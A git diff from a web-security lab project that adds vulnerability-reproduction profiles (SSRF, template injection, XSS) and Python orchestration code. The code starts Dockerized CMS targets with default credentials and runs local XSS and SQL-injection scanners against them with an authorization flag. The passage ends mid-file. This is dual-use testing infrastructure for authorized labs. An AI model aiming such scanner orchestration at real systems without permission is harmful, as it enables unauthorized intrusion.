100644 index 00000000..86b2cb5b --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/ssrf-generic.yaml @@ -0,0 +1,30 @@ +profile_id: ssrf-generic +match_rules: + keywords: + - ssrf + - server-side request forgery +vuln_family: ssrf +provisioning_mode: real +artifact_source: + strategy: official-image-or-source +required_services: + - app +seed_actions: + - kind: note + message: Route callbacks to local sink endpoints only. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Exercise local sink endpoints, not external third-party destinations. +browser_assertions: + required: false +success_criteria: + - Request sink receives expected callback without crossing authorization boundaries. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/template-injection-generic.yaml b/08-threat-intel/repro-profiles/family-generic/template-injection-generic.yaml new file mode 100644 index 00000000..5929f38e --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/template-injection-generic.yaml @@ -0,0 +1,30 @@ +profile_id: template-injection-generic +match_rules: + keywords: + - template injection + - ssti +vuln_family: template-injection +provisioning_mode: synthetic +artifact_source: + strategy: source-or-synthetic +required_services: + - app +seed_actions: + - kind: note + message: Keep expressions inert and avoid destructive primitives by default. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: note + message: Validate expression evaluation with benign markers. +browser_assertions: + required: false +success_criteria: + - Template evaluation path is proven with harmless marker output. +cleanup_policy: destroy +destructive_risk: medium +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/08-threat-intel/repro-profiles/family-generic/xss-generic.yaml b/08-threat-intel/repro-profiles/family-generic/xss-generic.yaml new file mode 100644 index 00000000..25d5e411 --- /dev/null +++ b/08-threat-intel/repro-profiles/family-generic/xss-generic.yaml @@ -0,0 +1,44 @@ +profile_id: xss-generic +match_rules: + keywords: + - xss + - cross-site scripting + - dom xss + - trusted types +vuln_family: xss +provisioning_mode: synthetic +artifact_source: + strategy: official-image-or-synthetic +required_services: + - app +seed_actions: + - kind: note + message: Seed a low-privilege user and a review page when the target supports stored content. +baseline_actions: + - kind: http-get + path: / +attack_actions: + - kind: tool + tool: xss-fuzzer + args: + - "-u" + - "{target_url}" + - "--dom-scan" + - "--check-csp" + - "--evidence-dir" + - "{evidence_dir}" + - "--run-id" + - "{run_id}" + - "--case-id" + - "{case_id}" +browser_assertions: + required: true + strategy: reflect-or-render +success_criteria: + - Browser evidence confirms payload reflection or DOM sink execution path. +cleanup_policy: destroy +destructive_risk: low +allowed_target_types: + - lab-local + - lab-public + - authorized-third-party diff --git a/scripts/intel/config.py b/scripts/intel/config.py index 063ab353..b3debfec 100644 --- a/scripts/intel/config.py +++ b/scripts/intel/config.py @@ -12,10 +12,13 @@ THREAT_INTEL_ROOT = ROOT / "08-threat-intel" REGISTRY_ROOT = THREAT_INTEL_ROOT / "registry" ADVISORIES_DIR = REGISTRY_ROOT / "advisories" SYSTEMS_DIR = REGISTRY_ROOT / "systems" +RUNS_DIR = REGISTRY_ROOT / "runs" TRIAGE_DIR = REGISTRY_ROOT / "triage" GENERATED_DIR = THREAT_INTEL_ROOT / "generated" SECURE_CODE_ROOT = ROOT / "05-defense" / "secure-code" SOURCE_MAP_PATH = THREAT_INTEL_ROOT / "source-map.yaml" +REPRO_MAP_PATH = THREAT_INTEL_ROOT / "repro-map.yaml" +REPRO_PROFILES_DIR = THREAT_INTEL_ROOT / "repro-profiles" STATE_DIR = Path.home() / ".local" / "state" / "websafe-intel" STATE_PATH = STATE_DIR / "state.json" @@ -33,6 +36,16 @@ def load_source_map() -> Dict[str, Any]: return data +def load_repro_map() -> Dict[str, Any]: + if not REPRO_MAP_PATH.exists(): + return {"systems": []} + with REPRO_MAP_PATH.open("r", encoding="utf-8") as handle: + data = yaml.safe_load(handle) or {} + if not isinstance(data, dict) or "systems" not in data: + return {"systems": []} + return data + + def get_systems_by_group(source_map: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]: groups: Dict[str, List[Dict[str, Any]]] = {} for system in source_map["systems"]: diff --git a/scripts/intel/models.py b/scripts/intel/models.py index e1ce8dfa..0fa05dea 100644 --- a/scripts/intel/models.py +++ b/scripts/intel/models.py @@ -64,6 +64,21 @@ class AdvisoryRecord: secure_code_topics: List[str] status: str triage_reasons: List[str] = field(default_factory=list) + verification_status: str = "triage-manual" + verification_mode: str = "synthetic" + last_verified_at: Optional[str] = None + last_run_id: Optional[str] = None + evidence_bundle: Optional[str] = None + browser_evidence: Dict[str, Any] = field( + default_factory=lambda: { + "required": False, + "present": False, + "refs": [], + } + ) + repro_profile_id: Optional[str] = None + artifact_mode: Optional[str] = None + blocked_reason: Optional[str] = None metadata: Dict[str, Any] = field(default_factory=dict) def to_dict(self) -> Dict[str, Any]: diff --git a/scripts/intel/render.py b/scripts/intel/render.py index c88a9094..855575ea 100644 --- a/scripts/intel/render.py +++ b/scripts/intel/render.py @@ -8,6 +8,8 @@ from typing import Any, Dict, Iterable, List from intel.config import FRAMEWORK_ROOT, GENERATED_DIR, REGISTRY_ROOT, ROOT, SECURE_CODE_ROOT, SYSTEMS_DIR, TRIAGE_DIR from intel.models import AdvisoryRecord from intel.utils import ensure_dir, isoformat, now_utc, write_json, write_text +from lab.render import render_dashboard as render_lab_dashboard +from lab.repro import annotate_with_latest_run, latest_runs_by_advisory UTC = timezone.utc @@ -109,6 +111,25 @@ FORBIDDEN_SCENARIOS = [ ] +def _merged_item(item: AdvisoryRecord, run_map: Dict[str, Dict[str, Any]]) -> Dict[str, Any]: + return annotate_with_latest_run(item.to_dict(), run_map.get(item.canonical_id)) + + +def _status_counts(items: List[Dict[str, Any]]) -> Dict[str, int]: + counts = {"verified_real": 0, "verified_synthetic": 0, "blocked": 0, "manual": 0} + for item in items: + status = item.get("verification_status") + if status == "verified-real": + counts["verified_real"] += 1 + elif status == "verified-synthetic": + counts["verified_synthetic"] += 1 + elif status and status.startswith("blocked-"): + counts["blocked"] += 1 + else: + counts["manual"] += 1 + return counts + + def _recent_count(items: Iterable[AdvisoryRecord], days: int = 30) -> int: cutoff = now_utc() - timedelta(days=days) total = 0 @@ -161,6 +182,7 @@ def _clear_json_dir(path: Path) -> None: def render_system_scaffolding(source_map: Dict[str, Any], advisories: List[AdvisoryRecord]) -> None: + run_map = latest_runs_by_advisory() grouped: Dict[str, List[AdvisoryRecord]] = defaultdict(list) for advisory in advisories: grouped[advisory.system_id].append(advisory) @@ -172,7 +194,9 @@ def render_system_scaffolding(source_map: Dict[str, Any], advisories: List[Advis ensure_dir(system_dir / "cases") items = sorted(grouped.get(system["system_id"], []), key=lambda item: item.published_at or "", reverse=True) + merged_items = [_merged_item(item, run_map) for item in items] markdown_count = len([item for item in items if item.render_markdown and item.case_path]) + counts = _status_counts(merged_items) index_lines = [ f"# {system['display_name']}", "", @@ -184,6 +208,10 @@ def render_system_scaffolding(source_map: Dict[str, Any], advisories: List[Advis f"- 总案例数: `{len(items)}`", f"- 近 30 天新增/更新: `{_recent_count(items)}`", f"- 重点 Markdown 案例数: `{markdown_count}`", + f"- 已实证(真实版本): `{counts['verified_real']}`", + f"- 已实证(synthetic): `{counts['verified_synthetic']}`", + f"- 阻塞数: `{counts['blocked']}`", + f"- 待人工/缺浏览器证据: `{counts['manual']}`", f"- 最近渲染时间: `{isoformat(now_utc())}`", "", "## 目标约束", @@ -205,19 +233,19 @@ def render_system_scaffolding(source_map: Dict[str, Any], advisories: List[Advis "", "## 案例列表", "", - "| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |", - "|------|--------|------|------------|----------|--------|", + "| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |", + "|------|--------|----------|----------|----------|------------|----------|--------|", ] ) - if items: - for item in items: - case_link = f"[link]({_abs_repo_path(item.case_path)})" if item.case_path else "-" - timestamp = item.updated_at or item.published_at or "" + if merged_items: + for item in merged_items: + case_link = f"[link]({_abs_repo_path(item['case_path'])})" if item.get("case_path") else "-" + timestamp = item.get("updated_at") or item.get("published_at") or "" index_lines.append( - f"| {item.title} | `{item.severity}` | `{item.status}` | `{item.source_confidence}` | `{timestamp}` | {case_link} |" + f"| {item['title']} | `{item['severity']}` | `{item['status']}` | `{item.get('verification_status', 'triage-manual')}` | `{item.get('verification_mode', '-')}` | `{item['source_confidence']}` | `{timestamp}` | {case_link} |" ) else: - index_lines.append("| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |") + index_lines.append("| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |") write_text(system_dir / "INDEX.md", "\n".join(index_lines)) system_registry_path = _abs_repo_path("08-threat-intel", "registry", "systems", f"{system['system_id']}.json") @@ -274,9 +302,11 @@ def render_system_scaffolding(source_map: Dict[str, Any], advisories: List[Advis def render_case_pages(advisories: List[AdvisoryRecord]) -> None: + run_map = latest_runs_by_advisory() for item in advisories: if not item.render_markdown or not item.case_path: continue + merged = _merged_item(item, run_map) lines = [ "---", f'title: "{item.title.replace(chr(34), chr(39))}"', @@ -288,6 +318,10 @@ def render_case_pages(advisories: List[AdvisoryRecord]) -> None: f'severity: "{item.severity}"', f'exploit_status: "{item.exploit_status}"', f'source_confidence: "{item.source_confidence}"', + f'verification_status: "{merged.get("verification_status", "triage-manual")}"', + f'verification_mode: "{merged.get("verification_mode", "synthetic")}"', + f'artifact_mode: "{merged.get("artifact_mode") or ""}"', + f'last_run_id: "{merged.get("last_run_id") or ""}"', 'target_types:', ' - "lab-local"', ' - "lab-public"', @@ -315,6 +349,15 @@ def render_case_pages(advisories: List[AdvisoryRecord]) -> None: "", f"# {item.title}", "", + "## 本地实证状态", + "", + f"- 实证状态: `{merged.get('verification_status', 'triage-manual')}`", + f"- 实证方式: `{merged.get('verification_mode', 'synthetic')}`", + f"- Artifact 模式: `{merged.get('artifact_mode') or 'unknown'}`", + f"- 最近运行: `{merged.get('last_run_id') or '-'}`", + f"- 浏览器证据: `{'present' if merged.get('browser_evidence', {}).get('present') else 'missing'}`", + f"- Run Bundle: `{merged.get('evidence_bundle') or '-'}`", + "", "## 事件层", "", f"- Canonical ID: `{item.canonical_id}`", @@ -362,9 +405,10 @@ def render_registry(source_map: Dict[str, Any], advisories: List[AdvisoryRecord] _clear_json_dir(REGISTRY_ROOT / "systems") _clear_json_dir(TRIAGE_DIR) + run_map = latest_runs_by_advisory() grouped: Dict[str, List[AdvisoryRecord]] = defaultdict(list) for advisory in advisories: - write_json(REGISTRY_ROOT / "advisories" / f"{advisory.canonical_id}.json", advisory.to_dict()) + write_json(REGISTRY_ROOT / "advisories" / f"{advisory.canonical_id}.json", _merged_item(advisory, run_map)) grouped[advisory.system_id].append(advisory) triage_by_system: Dict[str, List[Dict[str, Any]]] = defaultdict(list) @@ -375,6 +419,8 @@ def render_registry(source_map: Dict[str, Any], advisories: List[AdvisoryRecord] for system in source_map["systems"]: system_id = system["system_id"] items = grouped.get(system_id, []) + merged_items = [_merged_item(item, run_map) for item in items] + counts = _status_counts(merged_items) payload = { "system_id": system_id, "display_name": system["display_name"], @@ -386,6 +432,10 @@ def render_registry(source_map: Dict[str, Any], advisories: List[AdvisoryRecord] "latest_update": max((item.updated_at or item.published_at or "" for item in items), default=""), "output_dir": system["output_dir"], "secure_code_topics": system.get("secure_code_topics", []), + "verified_real": counts["verified_real"], + "verified_synthetic": counts["verified_synthetic"], + "blocked_count": counts["blocked"], + "manual_count": counts["manual"], "items": [item.canonical_id for item in sorted(items, key=lambda item: item.published_at or "", reverse=True)], } write_json(SYSTEMS_DIR / f"{system_id}.json", payload) @@ -400,6 +450,7 @@ def render_generated( ) -> None: ensure_dir(GENERATED_DIR) systems = {item["system_id"]: item for item in source_map["systems"]} + run_map = latest_runs_by_advisory() change_summary = change_summary or {} triage_by_system: Dict[str, List[Dict[str, Any]]] = defaultdict(list) for item in triage: @@ -408,19 +459,24 @@ def render_generated( coverage_lines = [ "# 覆盖矩阵", "", - "| 系统 | 分类 | 覆盖策略 | 历史全量 | 近两年全量 | 全量 registry | 重点案例 Markdown | secure-code 关联 | 自动同步状态 | triage | 最近更新 |", - "|------|------|----------|----------|------------|--------------|--------------------|------------------|--------------|--------|----------|", + "| 系统 | 分类 | 覆盖策略 | 历史全量 | 近两年全量 | 全量 registry | 重点案例 Markdown | secure-code 关联 | 自动同步状态 | 本地实证状态 | 浏览器证据 | run bundle | triage | 最近更新 |", + "|------|------|----------|----------|------------|--------------|--------------------|------------------|--------------|--------------|------------|-----------|--------|----------|", ] by_system: Dict[str, List[AdvisoryRecord]] = defaultdict(list) for advisory in advisories: by_system[advisory.system_id].append(advisory) for system_id, system in sorted(systems.items()): items = by_system.get(system_id, []) + merged_items = [_merged_item(item, run_map) for item in items] + counts = _status_counts(merged_items) markdown_count = len([item for item in items if item.case_path]) sync_state = "seeded" if items else "scaffolded" recent = max((item.updated_at or item.published_at or "" for item in items), default="") + browser_present = len([item for item in merged_items if item.get("browser_evidence", {}).get("present")]) + run_bundle_count = len([item for item in merged_items if item.get("last_run_id")]) + proof_state = f"real:{counts['verified_real']}/synthetic:{counts['verified_synthetic']}/blocked:{counts['blocked']}" coverage_lines.append( - f"| {system['display_name']} | `{system['category']}` | `{system['tier']}` | `{'yes' if system['tier'] == 'history-full' else '-'}` | `yes` | `{len(items)}` | `{markdown_count}` | `{len(system.get('secure_code_topics', []))}` | `{sync_state}` | `{len(triage_by_system.get(system_id, []))}` | `{recent}` |" + f"| {system['display_name']} | `{system['category']}` | `{system['tier']}` | `{'yes' if system['tier'] == 'history-full' else '-'}` | `yes` | `{len(items)}` | `{markdown_count}` | `{len(system.get('secure_code_topics', []))}` | `{sync_state}` | `{proof_state}` | `{browser_present}` | `{run_bundle_count}` | `{len(triage_by_system.get(system_id, []))}` | `{recent}` |" ) write_text(GENERATED_DIR / "coverage-matrix.md", "\n".join(coverage_lines)) @@ -432,6 +488,7 @@ def render_generated( f"- 系统数量: `{len(source_map['systems'])}`", f"- Advisory 数量: `{len(advisories)}`", f"- 重点 Markdown 数量: `{markdown_total}`", + f"- Run Bundle 数量: `{len(run_map)}`", f"- 新增记录: `{change_summary.get('new_count', 0)}`", f"- 更新记录: `{change_summary.get('updated_count', 0)}`", f"- Triage 数量: `{len(triage)}`", @@ -454,9 +511,11 @@ def render_generated( "updated_count": change_summary.get("updated_count", 0), "systems_touched": change_summary.get("systems_touched", []), "triage_count": len(triage), + "run_bundle_count": len(run_map), "failures": failures, }, ) + render_lab_dashboard() def render_secure_code(source_map: Dict[str, Any]) -> None: diff --git a/scripts/intel/validators.py b/scripts/intel/validators.py index 256f6c2d..3746472e 100644 --- a/scripts/intel/validators.py +++ b/scripts/intel/validators.py @@ -3,7 +3,7 @@ from __future__ import annotations from pathlib import Path from typing import Any, Dict, List -from intel.config import FRAMEWORK_ROOT, GENERATED_DIR, REGISTRY_ROOT, ROOT, SECURE_CODE_ROOT, SOURCE_MAP_PATH, SYSTEMS_DIR +from intel.config import FRAMEWORK_ROOT, GENERATED_DIR, REGISTRY_ROOT, REPRO_MAP_PATH, ROOT, SECURE_CODE_ROOT, SOURCE_MAP_PATH, SYSTEMS_DIR from intel.render import LANGUAGES, TOPIC_DESCRIPTIONS from intel.utils import load_all_json @@ -15,6 +15,9 @@ REQUIRED_REGISTRY_FIELDS = { "severity", "source_confidence", "status", + "verification_status", + "verification_mode", + "repro_profile_id", } REQUIRED_SYSTEM_FIELDS = { @@ -36,6 +39,8 @@ def validate(source_map: Dict[str, Any]) -> List[str]: errors: List[str] = [] if not SOURCE_MAP_PATH.exists(): errors.append("source-map.yaml is missing") + if not REPRO_MAP_PATH.exists(): + errors.append("repro-map.yaml is missing") systems = source_map.get("systems", []) ids = set() @@ -76,6 +81,8 @@ def validate(source_map: Dict[str, Any]) -> List[str]: GENERATED_DIR / "coverage-matrix.md", GENERATED_DIR / "latest-ingest.md", GENERATED_DIR / "run-summary.json", + GENERATED_DIR / "dashboard" / "index.html", + GENERATED_DIR / "dashboard" / "summary.json", ROOT / "08-threat-intel" / "registry" / "source-confidence.md", ]: if not path.exists(): diff --git a/scripts/lab/__init__.py b/scripts/lab/__init__.py new file mode 100644 index 00000000..ce643664 --- /dev/null +++ b/scripts/lab/__init__.py @@ -0,0 +1 @@ +"""Local authorized lab orchestration package.""" diff --git a/scripts/lab/attack.py b/scripts/lab/attack.py new file mode 100644 index 00000000..8dbdc6c2 --- /dev/null +++ b/scripts/lab/attack.py @@ -0,0 +1,66 @@ +from __future__ import annotations + +import subprocess +from pathlib import Path +from typing import Any, Dict, List + +from lab.utils import write_json + + +TOOL_COMMANDS = { + "xss-fuzzer": ["python3", "/Users/x/websafe/02-xss/tools/xss-fuzzer.py"], + "xss-scanner": ["go", "run", "/Users/x/websafe/02-xss/tools/xss-scanner.go"], + "sqli-scanner": ["python3", "/Users/x/websafe/01-sql-injection/tools/sqli-scanner.py"], + "blind-sqli": ["python3", "/Users/x/websafe/01-sql-injection/tools/blind-sqli.py"], + "session-lab": ["python3", "/Users/x/websafe/03-authentication/session/tools/session-lab.py"], + "misconfig-lab": ["python3", "/Users/x/websafe/04-server-security/misconfiguration/tools/misconfig-lab.py"], + "tls-scanner": ["python3", "/Users/x/websafe/04-server-security/tls/tools/tls-scanner.py"], + "site-scope-mapper": ["python3", "/Users/x/websafe/04-server-security/infrastructure/tools/site-scope-mapper.py"], +} + + +def _render_args(step: Dict[str, Any], profile: Dict[str, Any], advisory: Dict[str, Any], run_dir: Path) -> List[str]: + target = (profile.get("baseline_urls") or [""])[0] + mapping = { + "{target_url}": target, + "{run_id}": run_dir.name, + "{case_id}": advisory["canonical_id"], + "{evidence_dir}": str(run_dir / "logs"), + } + args: List[str] = [] + for item in step.get("args", []): + rendered = item + for key, value in mapping.items(): + rendered = rendered.replace(key, value) + args.append(rendered) + return args + + +def run_attack(profile: Dict[str, Any], advisory: Dict[str, Any], run_dir: Path, dry_run: bool = False) -> Dict[str, Any]: + steps: List[Dict[str, Any]] = [] + for step in profile.get("attack_actions", []): + tool_name = step.get("tool") + args = _render_args(step, profile, advisory, run_dir) + record = { + "kind": step.get("kind", "tool"), + "tool": tool_name, + "args": args, + "status": "planned" if dry_run else "skipped", + } + if step.get("kind") == "tool" and tool_name in TOOL_COMMANDS and not dry_run: + output_path = run_dir / "logs" / f"{tool_name}.json" + cmd = TOOL_COMMANDS[tool_name] + args + ["--ack-authorized", "--format", "json", "--output", str(output_path)] + completed = subprocess.run(cmd, text=True, capture_output=True) + record.update( + { + "status": "completed" if completed.returncode == 0 else "failed", + "returncode": completed.returncode, + "stdout_excerpt": completed.stdout[-400:], + "stderr_excerpt": completed.stderr[-400:], + "result_path": str(output_path), + } + ) + steps.append(record) + payload = {"steps": steps} + write_json(run_dir / "logs" / "attack.json", payload) + return payload diff --git a/scripts/lab/baseline.py b/scripts/lab/baseline.py new file mode 100644 index 00000000..3ba62be3 --- /dev/null +++ b/scripts/lab/baseline.py @@ -0,0 +1,28 @@ +from __future__ import annotations + +from pathlib import Path +from typing import Any, Dict, List + +import requests + +from lab.utils import write_json + + +def collect(profile: Dict[str, Any], run_dir: Path, timeout: float = 8.0) -> Dict[str, Any]: + observations: List[Dict[str, Any]] = [] + for url in profile.get("baseline_urls", []): + try: + response = requests.get(url, timeout=timeout, verify=False) + observations.append( + { + "url": url, + "status_code": response.status_code, + "headers": dict(response.headers), + "body_excerpt": response.text[:400], + } + ) + except Exception as exc: + observations.append({"url": url, "error": str(exc)}) + payload = {"observations": observations} + write_json(run_dir / "logs" / "baseline.json", payload) + return payload diff --git a/scripts/lab/browser.py b/scripts/lab/browser.py new file mode 100644 index 00000000..c69d49a8 --- /dev/null +++ b/scripts/lab/browser.py @@ -0,0 +1,47 @@ +from __future__ import annotations + +from pathlib import Path +from typing import Any, Dict, List + +from lab.utils import ensure_dir, write_json + + +def capture(url: str, run_dir: Path, prefix: str = "baseline") -> Dict[str, Any]: + payload: Dict[str, Any] = { + "required": True, + "present": False, + "refs": [], + "reason": "playwright runtime unavailable", + } + try: + from playwright.sync_api import sync_playwright # type: ignore + except Exception: + write_json(run_dir / "logs" / f"{prefix}-browser.json", payload) + return payload + + assets_dir = run_dir / "assets" + ensure_dir(assets_dir) + screenshot_path = assets_dir / f"{prefix}.png" + dom_path = assets_dir / f"{prefix}-dom.html" + console_path = run_dir / "logs" / f"{prefix}-console.json" + network_path = run_dir / "logs" / f"{prefix}-network.json" + console_messages: List[Dict[str, Any]] = [] + requests_seen: List[Dict[str, Any]] = [] + with sync_playwright() as p: + browser = p.chromium.launch(headless=True) + page = browser.new_page() + page.on("console", lambda msg: console_messages.append({"type": msg.type, "text": msg.text})) + page.on("request", lambda req: requests_seen.append({"method": req.method, "url": req.url})) + page.goto(url, wait_until="networkidle", timeout=20000) + page.screenshot(path=str(screenshot_path), full_page=True) + dom_path.write_text(page.content(), encoding="utf-8") + browser.close() + write_json(console_path, console_messages) + write_json(network_path, requests_seen) + payload = { + "required": True, + "present": True, + "refs": [str(screenshot_path), str(dom_path), str(console_path), str(network_path)], + } + write_json(run_dir / "logs" / f"{prefix}-browser.json", payload) + return payload diff --git a/scripts/lab/catalog.py b/scripts/lab/catalog.py new file mode 100644 index 00000000..934a73bc --- /dev/null +++ b/scripts/lab/catalog.py @@ -0,0 +1,254 @@ +from __future__ import annotations + +from pathlib import Path +from typing import Any, Dict, List, Tuple + +import yaml + +from intel.config import load_source_map +from lab.config import ENV_CATALOG_DIR, ENV_PROFILES_DIR, REPRO_MAP_PATH +from lab.utils import ensure_dir, read_yaml, slugify, write_yaml + + +IMAGE_HINTS: Dict[str, Dict[str, Any]] = { + "wordpress": { + "artifact_mode": "official-image", + "services": { + "app": {"image": "wordpress:php8.2-apache", "ports": ["18080:80"]}, + "db": { + "image": "mariadb:10.11", + "environment": { + "MARIADB_DATABASE": "wordpress", + "MARIADB_USER": "wordpress", + "MARIADB_PASSWORD": "wordpress", + "MARIADB_ROOT_PASSWORD": "root", + }, + }, + }, + "browser_required": True, + }, + "drupal": { + "artifact_mode": "official-image", + "services": { + "app": {"image": "drupal:10-apache", "ports": ["18081:80"]}, + "db": { + "image": "postgres:15", + "environment": { + "POSTGRES_DB": "drupal", + "POSTGRES_USER": "drupal", + "POSTGRES_PASSWORD": "drupal", + }, + }, + }, + "browser_required": True, + }, + "joomla": { + "artifact_mode": "official-image", + "services": { + "app": {"image": "joomla:latest", "ports": ["18082:80"]}, + "db": { + "image": "mariadb:10.11", + "environment": { + "MARIADB_DATABASE": "joomla", + "MARIADB_USER": "joomla", + "MARIADB_PASSWORD": "joomla", + "MARIADB_ROOT_PASSWORD": "root", + }, + }, + }, + "browser_required": True, + }, + "prestashop": { + "artifact_mode": "official-image", + "services": { + "app": {"image": "prestashop/prestashop:latest", "ports": ["18083:80"]}, + "db": { + "image": "mariadb:10.11", + "environment": { + "MARIADB_DATABASE": "prestashop", + "MARIADB_USER": "prestashop", + "MARIADB_PASSWORD": "prestashop", + "MARIADB_ROOT_PASSWORD": "root", + }, + }, + }, + "browser_required": True, + }, + "opencart": { + "artifact_mode": "official-image", + "services": { + "app": {"image": "bitnami/opencart:latest", "ports": ["18084:8080"]}, + "db": { + "image": "mariadb:10.11", + "environment": { + "MARIADB_DATABASE": "opencart", + "MARIADB_USER": "opencart", + "MARIADB_PASSWORD": "opencart", + "MARIADB_ROOT_PASSWORD": "root", + }, + }, + }, + "browser_required": True, + }, + "gitea": { + "artifact_mode": "official-image", + "services": { + "app": {"image": "gitea/gitea:1.22.6", "ports": ["18085:3000"]}, + }, + "browser_required": True, + }, + "nginx": { + "artifact_mode": "official-image", + "services": {"app": {"image": "nginx:1.27-alpine", "ports": ["18086:80"]}}, + "browser_required": False, + }, + "apache-httpd": { + "artifact_mode": "official-image", + "services": {"app": {"image": "httpd:2.4", "ports": ["18087:80"]}}, + "browser_required": False, + }, + "apache-tomcat": { + "artifact_mode": "official-image", + "services": {"app": {"image": "tomcat:10.1", "ports": ["18088:8080"]}}, + "browser_required": False, + }, + "nodejs": { + "artifact_mode": "official-source", + "services": {"app": {"image": "node:22-alpine", "ports": ["18089:3000"]}}, + "browser_required": False, + }, + "nextjs": { + "artifact_mode": "official-source", + "services": {"app": {"image": "node:22-alpine", "ports": ["18090:3000"]}}, + "browser_required": True, + }, + "vue": { + "artifact_mode": "official-source", + "services": {"app": {"image": "node:22-alpine", "ports": ["18091:5173"]}}, + "browser_required": True, + }, + "nuxt": { + "artifact_mode": "official-source", + "services": {"app": {"image": "node:22-alpine", "ports": ["18092:3000"]}}, + "browser_required": True, + }, + "vite": { + "artifact_mode": "official-source", + "services": {"app": {"image": "node:22-alpine", "ports": ["18093:5173"]}}, + "browser_required": True, + }, +} + + +def _default_repro_family(system: Dict[str, Any]) -> str: + topics = set(system.get("secure_code_topics", [])) + text = " ".join([system["display_name"], system["system_id"], *topics]).lower() + if "xss" in text or "trusted types" in text: + return "xss-generic" + if "proxy" in text or "middleware" in text: + return "proxy-boundary-generic" + if "upload" in text: + return "file-upload-generic" + if "ssrf" in text: + return "ssrf-generic" + if "deserialization" in text: + return "deserialization-generic" + if "template" in text: + return "template-injection-generic" + if "token" in text or "cookie" in text or "session" in text: + return "session-token-generic" + if any(mode in {"plugin", "module", "extension"} for mode in system.get("advisory_modes", [])): + return "plugin-extension-generic" + return "authz-bypass-generic" + + +def _fallback_port(system_id: str) -> str: + base = 18100 + (sum(ord(ch) for ch in system_id) % 700) + return f"{base}:80" + + +def _system_catalog(system: Dict[str, Any]) -> Dict[str, Any]: + hint = IMAGE_HINTS.get(system["system_id"], {}) + artifact_mode = hint.get("artifact_mode", "synthetic") + services = hint.get( + "services", + {"app": {"image": "nginxdemos/hello:latest", "ports": [_fallback_port(system["system_id"])]}}, + ) + return { + "system_id": system["system_id"], + "display_name": system["display_name"], + "category": system["category"], + "tier": system["tier"], + "artifact_mode_preference": [ + artifact_mode, + "official-source" if artifact_mode != "official-source" else "synthetic", + "synthetic", + ], + "default_repro_family": _default_repro_family(system), + "browser_required_default": bool(hint.get("browser_required", system["category"] in {"cms", "ecommerce", "frameworks", "platforms"})), + "log_collectors": ["docker-logs", "http-snapshot"], + "report_template": "default-lab-report", + "services": services, + "source_reference": system.get("official_sources", [])[:2], + } + + +def _profile_for_system(system: Dict[str, Any], catalog: Dict[str, Any]) -> Dict[str, Any]: + ports = [] + for service in catalog["services"].values(): + ports.extend(service.get("ports", [])) + baseline_url = None + if ports: + first = str(ports[0]).split(":")[0] + baseline_url = f"http://127.0.0.1:{first}/" + return { + "profile_id": f"{system['system_id']}-core-current", + "system_id": system["system_id"], + "version": "current", + "artifact_mode": catalog["artifact_mode_preference"][0], + "verification_mode": "real" if catalog["artifact_mode_preference"][0] != "synthetic" else "synthetic", + "browser_required": catalog["browser_required_default"], + "services": catalog["services"], + "baseline_urls": [baseline_url] if baseline_url else [], + "seed_actions": [{"kind": "note", "message": "Use default seed strategy derived from repro profile."}], + "cleanup_policy": "destroy", + } + + +def _build_repro_map_entry(system: Dict[str, Any], catalog: Dict[str, Any]) -> Dict[str, Any]: + return { + "system_id": system["system_id"], + "default_repro_family": catalog["default_repro_family"], + "provisioning_mode_preference": catalog["artifact_mode_preference"], + "browser_required_default": catalog["browser_required_default"], + "seed_strategy": "default-seed" if catalog["browser_required_default"] else "minimal-seed", + "log_collectors": catalog["log_collectors"], + "report_template": catalog["report_template"], + } + + +def sync_catalog(write_profiles: bool = True, write_repro_map: bool = True) -> Dict[str, Any]: + source_map = load_source_map() + ensure_dir(ENV_CATALOG_DIR) + ensure_dir(ENV_PROFILES_DIR / "core") + written_catalogs = 0 + written_profiles = 0 + repro_entries: List[Dict[str, Any]] = [] + for system in source_map["systems"]: + catalog = _system_catalog(system) + catalog_path = ENV_CATALOG_DIR / f"{system['system_id']}.yaml" + write_yaml(catalog_path, catalog) + written_catalogs += 1 + if write_profiles: + profile_dir = ENV_PROFILES_DIR / "core" / system["system_id"] + write_yaml(profile_dir / "current.yaml", _profile_for_system(system, catalog)) + written_profiles += 1 + repro_entries.append(_build_repro_map_entry(system, catalog)) + if write_repro_map: + write_yaml(REPRO_MAP_PATH, {"systems": repro_entries}) + return { + "systems": len(source_map["systems"]), + "catalogs_written": written_catalogs, + "profiles_written": written_profiles, + "repro_map_written": write_repro_map, + } diff --git a/scripts/lab/compose.py b/scripts/lab/compose.py new file mode 100644 index 00000000..6d64d808 --- /dev/null +++ b/scripts/lab/compose.py @@ -0,0 +1,32 @@ +from __future__ import annotations + +from pathlib import Path +from typing import Any, Dict, Tuple + +from lab.utils import write_yaml + + +def compose_payload(profile: Dict[str, Any]) -> Dict[str, Any]: + services = {} + for service_name, service in profile.get("services", {}).items(): + payload = { + "image": service["image"], + } + if service.get("ports"): + payload["ports"] = service["ports"] + if service.get("environment"): + payload["environment"] = service["environment"] + if service.get("depends_on"): + payload["depends_on"] = service["depends_on"] + services[service_name] = payload + return { + "services": services, + "networks": {"labnet": {"driver": "bridge"}}, + } + + +def generate_compose(profile: Dict[str, Any], run_dir: Path) -> Tuple[Path, Dict[str, Any]]: + payload = compose_payload(profile) + compose_path = run_dir / "compose" / "compose.yaml" + write_yaml(compose_path, payload) + return compose_path, payload diff --git a/scripts/lab/config.py b/scripts/lab/config.py new file mode 100644 index 00000000..2f169f5a --- /dev/null +++ b/scripts/lab/config.py @@ -0,0 +1,25 @@ +from __future__ import annotations + +from pathlib import Path + + +ROOT = Path(__file__).resolve().parents[2] +SCRIPTS_ROOT = ROOT / "scripts" +INTEL_ROOT = ROOT / "08-threat-intel" +REGISTRY_ROOT = INTEL_ROOT / "registry" +ADVISORIES_DIR = REGISTRY_ROOT / "advisories" +SYSTEMS_DIR = 